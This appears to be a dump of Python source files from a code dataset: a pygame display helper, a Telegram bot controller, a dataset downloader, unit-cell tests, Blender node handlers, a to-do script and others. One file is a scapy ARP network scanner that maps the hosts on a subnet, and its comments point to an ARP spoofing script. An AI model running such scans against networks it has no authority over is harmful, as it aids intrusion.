flags)\n\tif fullscreen:\n\t\tif modes == -1: # Welcome to exceptionlessland\n\t\t\traise SystemExit(\"Failed to initialize display\")\n\t\telse:\n\t\t\tmode = max(modes)\n\telse:\n\t\tmode = 
(settings.screen_width,settings.screen_height)\n\t \n\tdisplay.set_mode(mode, flags)\n\t#print(modes)\n\t#print(mode[0])\n\t#print(mode[1])\n\treturn (display.get_surface(),mode[0],mode[1])\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331522205","text":"from sqlalchemy.exc import NoResultFound\nfrom telegram import Update\nfrom telegram.ext import Updater, CallbackContext, ConversationHandler, CommandHandler\n\nfrom ring_of_fire_bot.model.Exceptions.invalid_node_key_exception import InvalidNodeKeyException\nfrom ring_of_fire_bot.model.user import User\nfrom ring_of_fire_bot.repository.i_unit_of_work import IUnitOfWork\nfrom ring_of_fire_bot.utils.utils import is_in_dm\nfrom ring_of_fire_bot.view.error_view import ErrorView\nfrom ring_of_fire_bot.view.user_view import UserView\n\n\nclass UserController:\n def __init__(self, updater: Updater, unit_of_work: IUnitOfWork):\n self.updater = updater\n self.unit_of_work = unit_of_work\n self.userView: UserView = UserView(self.updater)\n self.error_view: ErrorView = ErrorView(self.updater)\n\n def get_commands(self):\n return ConversationHandler(entry_points=[\n CommandHandler(\"register\", self.register),\n CommandHandler(\"update_username\", self.update_username),\n CommandHandler(\"set_node_id\", self.set_node_id),\n CommandHandler(\"remove_node_id\", self.remove_node_id)\n ],\n states={}, fallbacks=[], allow_reentry=True)\n\n def register(self, update: Update, context: CallbackContext):\n # check if in DM\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n\n sender = update.effective_user\n try:\n _ = self.unit_of_work.user_repository.get(sender.id)\n # if user_repository.get does not throw a NoResultFound exception the user has already registered\n self.error_view.send_message(update.effective_chat.id, \"You are already 
registered!\")\n except NoResultFound:\n user = User(sender.id, sender.username)\n self.unit_of_work.user_repository.add(user)\n self.userView.registered(update.effective_chat.id)\n return\n\n def update_username(self, update: Update, context: CallbackContext):\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.set_username(update.effective_user.username)\n self.unit_of_work.complete()\n self.userView.updated_username(update.effective_chat.id, user.user_username)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before updating \"\n \"your username\")\n\n def set_node_id(self, update: Update, context: CallbackContext):\n node_id = update.message.text.split(' ', 1)[1]\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.set_node_id(node_id)\n self.unit_of_work.complete()\n self.userView.updated_node_id(update.effective_chat.id, node_id)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before updating \"\n \"your node id\")\n except InvalidNodeKeyException:\n self.error_view.send_message(update.effective_chat.id, \"The node id is invalid\")\n\n def remove_node_id(self, update: Update, context: CallbackContext):\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user: User = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.remove_node_id()\n self.unit_of_work.complete()\n self.userView.removed_node_id(update.effective_chat.id)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before removing your node id\")\n except InvalidNodeKeyException:\n 
self.error_view.send_message(update.effective_chat.id, \"The node id is invalid\")\n","sub_path":"ring_of_fire_bot/controller/user_controller.py","file_name":"user_controller.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382428019","text":"import io\nimport logging\nimport os\nimport re\nimport zipfile\nfrom pathlib import Path\nfrom typing import Union\n\nimport natsort as ns\nimport requests\nfrom jsonpath_ng import parse\nfrom scitree import scitree\nfrom tqdm import tqdm\n\nfrom datahugger.utils import _format_filename\nfrom datahugger.utils import _is_url\n\nFILE_RANKING = [\n [\"readme\", \"read_me\", \"read-me\"],\n [\"license\"],\n [\"installation\", \"install\", \"setup\"],\n]\n\n\ndef _scientific_sort(f, alg=ns.PATH):\n for rank, names in enumerate(FILE_RANKING):\n if Path(f).stem.lower() in names:\n prio = rank\n break\n else:\n prio = len(FILE_RANKING)\n\n x = (prio,) + ns.natsort_keygen(alg=alg)(f)\n\n return x\n\n\nclass DatasetResult:\n \"\"\"Result class after downloading the dataset.\"\"\"\n\n def __str__(self):\n return f\"<{self.__class__.__name__} n_files={len(self)} >\"\n\n def __len__(self):\n return len(self.files)\n\n def tree(self, **kwargs):\n \"\"\"Return the folder tree.\n\n Tree based on scientific sort.\n \"\"\"\n\n return scitree(self.output_folder, **kwargs)\n\n\nclass DatasetDownloader:\n \"\"\"Base class for downloading resources from repositories.\"\"\"\n\n API_URL = None\n\n def __init__(\n self,\n url: Union[str, int],\n version=None,\n base_url=None,\n max_file_size=None,\n force_download=False,\n progress=True,\n unzip=True,\n print_only=False,\n ):\n super().__init__()\n self.url = url\n self.version = version\n self.base_url = base_url\n self.max_file_size = max_file_size\n self.force_download = force_download\n self.progress = progress\n self.unzip = unzip\n self.print_only = print_only\n\n def _get_attr_attr(self, 
record, jsonp):\n try:\n jsonpath_expression = parse(jsonp)\n return jsonpath_expression.find(record)[0].value\n except Exception:\n return None\n\n def _get_attr_link(self, record):\n # get the link to the folder\n if self._get_attr_kind(record) == \"folder\":\n if not hasattr(self, \"ATTR_FOLDER_LINK_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_FOLDER_LINK_JSONPATH)\n\n # get the link to the file\n else:\n if not hasattr(self, \"ATTR_FILE_LINK_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_FILE_LINK_JSONPATH)\n\n def _get_attr_name(self, record):\n if not hasattr(self, \"ATTR_NAME_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_NAME_JSONPATH)\n\n def _get_attr_size(self, record):\n if not hasattr(self, \"ATTR_SIZE_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_SIZE_JSONPATH)\n\n def _get_attr_hash(self, record):\n if not hasattr(self, \"ATTR_HASH_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_HASH_JSONPATH)\n\n def _get_attr_hash_type(self, record):\n if hasattr(self, \"ATTR_HASH_TYPE_VALUE\"):\n return self.ATTR_HASH_TYPE_VALUE\n\n if not hasattr(self, \"ATTR_HASH_TYPE_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_HASH_TYPE_JSONPATH)\n\n def _get_attr_kind(self, record):\n if not hasattr(self, \"ATTR_KIND_JSONPATH\"):\n return \"file\"\n\n return self._get_attr_attr(record, self.ATTR_KIND_JSONPATH)\n\n def download_file(\n self,\n file_link,\n output_folder,\n file_name,\n file_size=None,\n file_hash=None,\n file_hash_type=None,\n ):\n \"\"\"Download a single file.\n\n Arguments\n ---------\n file_link: str\n Path to the file to download.\n output_folder: str\n The folder to store the downloaded file.\n file_name: str\n The filename of the downloaded file.\n file_size: int\n The size of the file in bytes.\n file_hash: str\n The MD5 hash of the file.\n\n \"\"\"\n if (\n file_size is not 
None\n and self.max_file_size is not None\n and file_size >= self.max_file_size\n ):\n logging.info(f\"Skipping large file {file_link}\")\n if self.progress:\n print(f\"{_format_filename(file_name)}: SKIPPED\")\n return\n\n if not self.print_only:\n logging.info(f\"Downloading file {file_link}\")\n res = requests.get(file_link, stream=True)\n\n output_fp = Path(output_folder, file_name)\n Path(output_fp).parent.mkdir(parents=True, exist_ok=True)\n\n if not self.force_download and output_fp.exists():\n print(\"File already exists:\", file_name)\n return\n\n if self.progress:\n with tqdm.wrapattr(\n open(output_fp, \"wb\"),\n \"write\",\n miniters=1,\n desc=_format_filename(file_name),\n total=int(res.headers.get(\"content-length\", 0)),\n bar_format=\"{l_bar}{bar}| {n_fmt}/{total_fmt}\",\n ) as fout:\n for chunk in res.iter_content(chunk_size=4096):\n fout.write(chunk)\n else:\n with open(output_fp, \"wb\") as f:\n f.write(res.content)\n else:\n print(f\"{_format_filename(file_name)}: COMPLETE\")\n\n def _parse_url(self, url):\n if not isinstance(url, str) or not _is_url(url):\n raise ValueError(\"Not a valid URL.\")\n\n # first try to parse with version number\n if hasattr(self, \"REGEXP_ID_AND_VERSION\"):\n match = re.search(self.REGEXP_ID_AND_VERSION, url)\n\n if match and match.group(1):\n if match.group(2) == \"\":\n return match.group(1), None\n return match.group(1), match.group(2)\n\n # then try to parse without version number\n if hasattr(self, \"REGEXP_ID\"):\n match = re.search(self.REGEXP_ID, url)\n\n if match and match.group(1):\n return match.group(1), None\n\n raise ValueError(f\"Failed to parse record identifier from URL '{url}'\")\n\n def _unpack_single_folder(self, zip_url, output_folder):\n r = requests.get(zip_url)\n z = zipfile.ZipFile(io.BytesIO(r.content))\n\n for zip_info in z.infolist():\n if zip_info.filename[-1] == \"/\":\n continue\n zip_info.filename = os.path.basename(zip_info.filename)\n z.extract(zip_info, output_folder)\n\n 
@property\n def api_record_id(self):\n if hasattr(self, \"_api_record_id\"):\n return self._api_record_id\n\n if isinstance(self.url, str) and _is_url(self.url):\n self._api_record_id, self.version = self._parse_url(self.url)\n else:\n self._api_record_id, self.version = self.url, self.version\n\n return self._api_record_id\n\n def _pre_files(self):\n pass\n\n def _get_files_recursive(self, url, folder_name=None):\n if not isinstance(url, str):\n ValueError(f\"Expected url to be string type, got {type(url)}\")\n\n result = []\n\n # get the data from URL\n res = requests.get(url)\n response = res.json()\n\n # find path to raw files\n if hasattr(self, \"META_FILES_JSONPATH\"):\n jsonpath_expression = parse(self.META_FILES_JSONPATH)\n files_raw = jsonpath_expression.find(response)[0].value\n else:\n files_raw = response\n\n for f in files_raw:\n # create the file or folder path\n if folder_name is None:\n f_path = self._get_attr_name(f)\n else:\n f_path = str(Path(folder_name, self._get_attr_name(f)))\n\n if self._get_attr_kind(f) == \"folder\":\n result.extend(\n self._get_files_recursive(\n self._get_attr_link(f), folder_name=f_path\n )\n )\n else:\n result.append(\n {\n \"link\": self._get_attr_link(f),\n \"name\": f_path,\n \"size\": self._get_attr_size(f),\n \"hash\": self._get_attr_hash(f),\n \"hash_type\": self._get_attr_hash_type(f),\n }\n )\n\n if hasattr(self, \"PAGINATION_JSONPATH\"):\n jsonpath_expression = parse(self.PAGINATION_JSONPATH)\n next_url = jsonpath_expression.find(response)[0].value\n\n if next_url:\n result.extend(\n self._get_files_recursive(next_url, folder_name=folder_name)\n )\n\n return result\n\n @property\n def files(self):\n if hasattr(self, \"_files\"):\n return self._files\n\n self._pre_files()\n\n self._files = self._get_files_recursive(\n self.API_URL_META.format(\n api_url=self.API_URL,\n api_record_id=self.api_record_id,\n version=self.version,\n base_url=self.base_url,\n )\n )\n\n return self._files\n\n def _get(\n self,\n 
output_folder: Union[Path, str],\n **kwargs,\n ):\n if len(self.files) == 1 and self.files[0][\"link\"].endswith(\".zip\"):\n self._unpack_single_folder(self.files[0][\"link\"], output_folder)\n return\n\n for f in self.files:\n self.download_file(\n f[\"link\"],\n output_folder,\n file_name=f[\"name\"],\n file_size=f[\"size\"],\n file_hash=f[\"hash\"],\n file_hash_type=f[\"hash_type\"],\n )\n\n def download(\n self,\n output_folder: Union[Path, str],\n **kwargs,\n ):\n \"\"\"Download files for the given URL or record id.\n\n Arguments\n ---------\n record_id_or_url: str\n The identifier of the record or the url to the resource\n to download.\n output_folder: str\n The folder to store the downloaded results.\n version: str, int\n The version of the dataset\n\n \"\"\"\n Path(output_folder).mkdir(parents=True, exist_ok=True)\n\n self._get(output_folder, **kwargs)\n\n # store the location of the last known output folder\n self.output_folder = output_folder\n\n return self\n","sub_path":"datahugger/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499853023","text":"from math import sqrt, isnan\nimport numpy.random\nimport numpy as np\n\nimport pytest\n\nfrom numpy.testing import *\n\nfrom cryspy.unit_cell import (UnitCell,\n UnitCellLenghtsOrAnglesAreNotFeasibleError)\n\n\ndef test_construction():\n eps = 1e-15\n\n uc = UnitCell(1, 2, 3, 60, 120, 90)\n assert uc.a == 1\n assert uc.b == 2\n assert uc.c == 3\n assert uc.alpha == 60\n assert uc.beta == 120\n assert uc.gamma == 90\n assert abs(uc.volume - 3 * sqrt(2)) < eps\n\n uc = UnitCell(1, 1, 1, 60, 60, 60)\n assert abs(uc.volume - 1 / sqrt(2)) < eps\n\n for p in ((0, 1, 1, 85, 91, 98),\n (1, 1, 1, 66, 66, 0),\n (1, 1, 1, 55, 0, 55),\n (1, 1, 1, 0, 44, 44),\n (1, 1, 1, 60, 60, 130),\n ):\n with pytest.raises(UnitCellLenghtsOrAnglesAreNotFeasibleError):\n UnitCell(*p)\n\ndef test_copy():\n 
from copy import copy\n uc = UnitCell(1, 2, 3, 87, 88, 89)\n uc1 = copy(uc)\n assert uc.parameters == uc1.parameters\n\ndef test_pickle():\n from pickle import dumps, loads\n uc = UnitCell(10, 20, 30, 100, 80, 110)\n uc1 = loads(dumps(uc))\n assert uc.parameters == uc1.parameters\n\ndef test_feasible_angles(trials=50000):\n marker = UnitCell(1,1,1,1,1,1)\n def uc(s):\n try:\n return UnitCell.from_sextuple(s)\n except UnitCellLenghtsOrAnglesAreNotFeasibleError:\n return marker\n angles = np.random.rand(trials, 3)\n angles *= 180\n lengths = np.ones((trials, 3))\n params = np.concatenate((lengths, angles), axis=1)\n cells = np.apply_along_axis(uc, axis=1, arr=params).ravel()\n invalidities = cells == marker\n\n # Remark in last paragraph of first column on p. 94 of ref [1] given\n # in the documentation of class UnitCell\n assert_almost_equal(np.count_nonzero(invalidities)/len(invalidities), 2/3,\n decimal=2)\n\n","sub_path":"cryspytests/test_unit_cell.py","file_name":"test_unit_cell.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473117855","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\nimport bpy\nimport math, mathutils\nfrom bpy.app.handlers import persistent\n\n\ncustom_nodes_type = [\"ColorCombineNodeType\",\n \"ColorPaletteNodeType\",\n \"ColorSplitNodeType\",\n \"ColorNodeType\",\n \"DataInputNodeType\",\n \"DataOutputNodeType\",\n \"DebugNodeType\",\n \"ExpressionNodeType\",\n \"DistanceNodeType\",\n \"FloatSwitchNodeType\",\n \"FloatToIntNodeType\",\n \"FloatToStringNodeType\",\n \"FloatNodeType\",\n \"IntToFloatNodeType\",\n \"NoteNodeType\",\n \"ObjectPropertiesNodeType\",\n \"RenderNodeType\",\n \"RenderLayersNodeType\",\n \"RoundNodeType\",\n \"TimeNodeType\",\n \"VectorSplitNodeType\",\n \"VectorNodeType\"]\n\ndef update_nodes(scene):\n #print (\"update_nodes\")\n \n # update compositing tree\n if scene.node_tree:\n for node in scene.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n\n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n\n\n\ndef update_compositing_tree(scene, object, custom_nodes_type):\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n if node.data_item == object.name:\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_material_tree(scene, object, custom_nodes_type):\n for material in bpy.data.materials:\n if material.node_tree 
!= None:\n for node in material.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_world_tree(scene, object, custom_nodes_type):\n for world in bpy.data.worlds:\n if world.use_nodes:\n for node in scene.world.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n if node.data_item == object.name:\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_custom_tree(scene, object, custom_nodes_type):\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\n\n@persistent\ndef frame_change(scene):\n #print (\"frame_change\")\n update_nodes(scene)\n\n@persistent\ndef scene_update(scene):\n #print (\"scene_update\")\n check_objects = bpy.data.objects.is_updated\n check_scene = bpy.context.scene.is_updated\n \n if check_objects:\n #print (\"check_objects\")\n for object in bpy.data.objects:\n if object.is_updated:\n #print (\"check_object\", object)\n update_compositing_tree(scene, object, custom_nodes_type)\n update_material_tree(scene, object, custom_nodes_type)\n update_world_tree(scene, object, custom_nodes_type)\n update_custom_tree(scene, object, custom_nodes_type)\n \n if check_scene:\n #print (\"check_scene\")\n for object in bpy.data.objects:\n update_compositing_tree(scene, object, custom_nodes_type)\n update_material_tree(scene, object, custom_nodes_type)\n update_world_tree(scene, object, custom_nodes_type)\n update_custom_tree(scene, object, custom_nodes_type)\n \n \n \n ### node tree update ###\n '''\n # update compositing tree\n tree = scene.node_tree\n if scene.use_nodes:\n if 
tree.is_updated:\n update_nodes(scene)\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.use_nodes:\n if material.is_updated:\n update_nodes(scene)\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n if tree.is_updated:\n update_nodes(scene)\n '''\n \n \n \n \n \n \n@persistent\ndef render_pre_update(scene):\n \n RenderNodeType = [\"RenderNodeType\"]\n # update compositing tree\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n@persistent\ndef render_post_update(scene):\n \n RenderNodeType = [\"RenderNodeType\"]\n # update compositing tree\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n\n\n\n\ndef send_value(outputs, value):\n for output in outputs:\n for link in output.links:\n \n if not link.is_valid:\n continue\n \n # REROUTE\n if link.to_node.type == 'REROUTE':\n reroute = link.to_node\n send_value(reroute.outputs, value)\n \n \n elif output.type == link.to_socket.type:\n # assign value to connected socket\n link.to_socket.default_value = value\n # update connected 
target nodes\n link.to_node.update()\n \n # convert types\n #elif output.type == \"RGBA\" and link.to_socket.type == \"VALUE\":\n #link.to_socket.default_value = value[0]\n #link.to_node.update()\n #elif output.type == \"VECTOR\" and link.to_socket.type == \"VALUE\":\n #link.to_socket.default_value = value[0]\n #link.to_node.update()\n #elif output.type == \"VALUE\" and link.to_socket.type == \"RGBA\":\n #link.to_socket.default_value[0] = value\n #link.to_socket.default_value[1] = value\n #link.to_socket.default_value[2] = value\n #link.to_socket.default_value[3] = value\n #link.to_node.update()\n #elif output.type == \"VALUE\" and link.to_socket.type == \"VECTOR\":\n #link.to_socket.default_value[0] = value\n #link.to_socket.default_value[1] = value\n #link.to_socket.default_value[2] = value\n #link.to_node.update()\n \n else:\n ok = None\n \n if output.type == \"VALUE\" and link.to_socket.type == \"BOOLEAN\":\n ok = True\n elif output.type == \"VALUE\" and link.to_socket.type == \"INT\":\n ok = True\n elif output.type == \"BOOLEAN\" and link.to_socket.type == \"VALUE\":\n ok = True\n elif output.type == \"BOOLEAN\" and link.to_socket.type == \"INT\":\n ok = True\n elif output.type == \"INT\" and link.to_socket.type == \"VALUE\":\n ok = True\n elif output.type == \"INT\" and link.to_socket.type == \"BOOLEAN\":\n ok = True\n \n if ok:\n link.to_socket.default_value = value\n link.to_node.update()\n \n \n \ndef send_value_link(link, value):\n if link.is_valid:\n # REROUTE\n if link.to_node.type == 'REROUTE':\n reroute = link.to_node\n reroute_links = reroute.outputs[0].links\n for reroute_link in reroute_links:\n send_value(reroute_link, value)\n\n #elif output.type == link.to_socket.type:\n else:\n # assign value to connected socket\n link.to_socket.default_value = value\n # update connected target nodes\n 
link.to_node.update()\n\n","sub_path":"addons/data_nodes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398776561","text":"#-------------------------------------------------#\r\n# Title: Working with Dictionaries\r\n# Dev: Samantha Chang\r\n# Date: April 28, 2019\r\n# ChangeLog: (Who, When, What)\r\n#-------------------------------------------------#\r\n\r\n#-- Data --#\r\n# declare variables and constants\r\n# objFile = An object that represents a file\r\n# strData = A row of text data from the file\r\n# dicRow = A row of data separated into elements of a dictionary {Task,Priority}\r\n# lstTable = A dictionary that acts as a 'table' of rows\r\n# strMenu = A menu of user options\r\n# strChoice = Capture the user option selection\r\n\r\n#-- Input/Output --#\r\n# User can see a Menu (Step 2)\r\n# User can see data (Step 3)\r\n# User can insert or delete data(Step 4 and 5)\r\n# User can save to file (Step 6)\r\n\r\n#-- Processing --#\r\n# Step 1\r\n# When the program starts, load the any data you have\r\n# in a text file called ToDo.txt into a python Dictionary.\r\n\r\n# Step 2\r\n# Display a menu of choices to the user\r\n\r\n# Step 3\r\n# Display all todo items to user\r\n\r\n# Step 4\r\n# Add a new item to the list/Table\r\n\r\n# Step 5\r\n# Remove a new item to the list/Table\r\n\r\n# Step 6\r\n# Save tasks to the ToDo.txt file\r\n\r\n# Step 7\r\n# Exit program\r\n#-------------------------------\r\n\r\n# Step 1 - Load data from a file\r\n # When the program starts, load each \"row\" of data \r\n # in \"ToDo.txt\" into a python Dictionary.\r\n # Add the each dictionary \"row\" to a python list \"table\"\r\n\r\ntodoFile = open('ToDo.txt', 'r')\r\ndicTask = {}\r\nlstTable = []\r\n\r\nfor line in todoFile:\r\n strTask = line.strip().split(',')[0]\r\n strPriority = line.strip().split(',')[1]\r\n dicTask = {'Task':strTask, 
'Priority':strPriority}\r\n lstTable.append(dicTask)\r\n\r\ntodoFile.close()\r\n\r\nstrMenu = \"\"\"\r\n Menu of Options\r\n 1) Show current data\r\n 2) Add a new item.\r\n 3) Remove an existing item.\r\n 4) Save Data to File\r\n 5) Exit Program\r\n \"\"\"\r\n\r\n# Step 2 - Display a menu of choices to the user\r\nwhile(True):\r\n print(strMenu)\r\n strChoice = str(input(\"Which option would you like to perform? [1 to 4] - \"))\r\n\r\n # Step 3 -Show the current items in the table\r\n if (strChoice.strip() == '1'):\r\n print(lstTable)\r\n continue\r\n # Step 4 - Add a new item to the list/Table\r\n elif(strChoice.strip() == '2'):\r\n strTask = input('Enter a new task:')\r\n strPriority = input('Enter a priority:')\r\n\r\n dicNew = {\"Task\":strTask, \"Priority\":strPriority}\r\n lstTable.append(dicNew)\r\n print(\"You have added a new task to the table.\", dicNew)\r\n print(\"The table now shows\", lstTable)\r\n continue\r\n # Step 5 - Remove a new item to the list/Table\r\n elif(strChoice == '3'):\r\n RmvItem = input(\"Enter a task to remove: \")\r\n indexNo = 0\r\n for eachDic in lstTable:\r\n if eachDic['Task'] == RmvItem:\r\n lstTable.pop(indexNo)\r\n print(\"You have removed a task from the table.\", RmvItem)\r\n print(\"The table now shows\", lstTable)\r\n indexNo = indexNo + 1\r\n continue\r\n # Step 6 - Save tasks to the ToDo.txt file\r\n elif(strChoice == '4'):\r\n open(\"Todo.txt\", \"w\").close()\r\n objFile = open(\"Todo.txt\", \"a\")\r\n for eachDic in lstTable:\r\n strLine = eachDic['Task'] + ',' + eachDic['Priority'] + '\\n'\r\n objFile.write(strLine)\r\n objFile.close()\r\n print('Your data is saved. Go to Todo.txt file for review.')\r\n continue\r\n elif (strChoice == '5'):\r\n print(\"You chose to exit the program. 
Exiting the program.\")\r\n break #and Exit the program","sub_path":"Assigment05.py","file_name":"Assigment05.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499566116","text":"#!/usr/bin/env python\r\nimport scapy.all as scapy#1 download this to implement this \r\n# first need to creat packet asking who has this ip and broadcasting it using broadcast address dest mac=broadcast mac\r\n# use arp to do\r\nimport argparse#same as optparse but successor of optparse so use argparse simply replace arg=opt and argument=option\r\ndef get_arguments():#13 \r\n parser=argparse.ArgumentParser()\r\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"target IP/IP range\")\r\n # (options,arguments)=parser.parse_args()#13 argparse only return options so\r\n options = parser.parse_args()\r\n return options\r\n\r\ndef scan(ip):\r\n # first creaate packet using scapy\r\n arp_request=scapy.ARP(pdst=ip)#2 ,6 for setting pdst\r\n # arp_request.show()# to get more info than summary do after set pdst\r\n # arp_request.pdst=ip#5 to set for particular ip rather than 0.0.0.0 in 3 ie summary but alternet way to set is in 2 ie when obj created\r\n # print(arp_request.summary())#3 give summary of\r\n # scapy.ls(scapy.ARP())#4 used to list values which can be used to set them eg pdst in list to ip\r\n broadcast=scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")#7 for setting broadcast address in packet which require ethernet frame\r\n # broadcast.show()# do after set dst\r\n # print(broadcast.summary())#7 similar for arp obj\r\n # scapy.ls(scapy.Ether())#7 similar for arp obj ,set dest\r\n # broadcast.dst=\"ff:ff:ff:ff:ff:ff\"#8 or direct set in obj look up set broadcast address\r\n # print(broadcast.summary())#8 get value for mac os source and dest as broadcast\r\n arp_request_broadcast=broadcast/arp_request#combine 2 packet to form one packet to send containing both ip and broadcast mac\r\n 
# arp_request_broadcast.show()#9\r\n answered_list,unanswered_list=scapy.srp(arp_request_broadcast,timeout=1)#10 for send the packetand receive the outcome as ans and unans\r\n #here ether address is broadcast so it go to righ direction of same subnet devices\r\n #if you have used different mac and config some value in ls than it would have gone to that device and received response for other purpose\r\n #timeout is no of sec so program dont go death waiting outcome or response in same line and not proceeding\r\n #there is also sr function but srp is used to send packet with customn ether part \r\n # two response answered and unanswered packet use ans ,unans contain more data print and look\r\n # print(answered_list.summary())\r\n\r\n #error due to verbose not used as in arp spoof py script\r\n print(\"IP\\t\\t\\tMAC Address\\n...........................................\")\r\n for element in answered_list:\r\n print(element[1].psrc + \"\\t\\t\" + element[1].hwsrc)\r\n \r\noptions=get_arguments() \r\nscan(options.target)\r\n\r\n# run like ./network1_scanner.py -t 10.0.2.3/24\r\n# pip3 install scapy-python3","sub_path":"network1_scanner.py","file_name":"network1_scanner.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457602645","text":"import time\nimport RPi.GPIO as GPIO\n \nMONITOR_PIN = 18\n \nclass MotionSensor:\n\n def detect(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(MONITOR_PIN, GPIO.IN)\n try:\n new = 1\n while True:\n old = new\n new = GPIO.input(MONITOR_PIN)\n #print(new, old)\n if old - new == 1:\n return True\n time.sleep(0.1)\n except KeyboardInterrupt:\n print('stop')\n finally:\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n pir = MotionSensor()\n #pir.scan()\n","sub_path":"pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"358397213","text":"# -*- coding: utf-8 -*-\nimport pytest\nimport requests\n\n\nclass Test_Class:\n def test_one(self):\n url1 = 'http://v.juhe.cn/telecode/to_telecodes.php'\n data = {'chars': '北京', 'key': 'e23273293b709acd3be5b9d66598179b'}\n res = requests.post(url1, data)\n print(res.status_code)\n print(res.text)\n","sub_path":"pytest_api_test/common/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"89199880","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom association.models import Association\nfrom pr.models import Clip\n\n\n@login_required\ndef clips(request):\n association = get_object_or_404(Association, pseudo=\"pr\")\n pr = Association.objects.filter(id=30)[0]\n if request.user.profile.en_premiere_annee() and pr.is_hidden_1A:\n clip_list = []\n else:\n clip_list = Clip.objects.all()\n\n return render(\n request,\n 'pr/clips.html',\n {\n 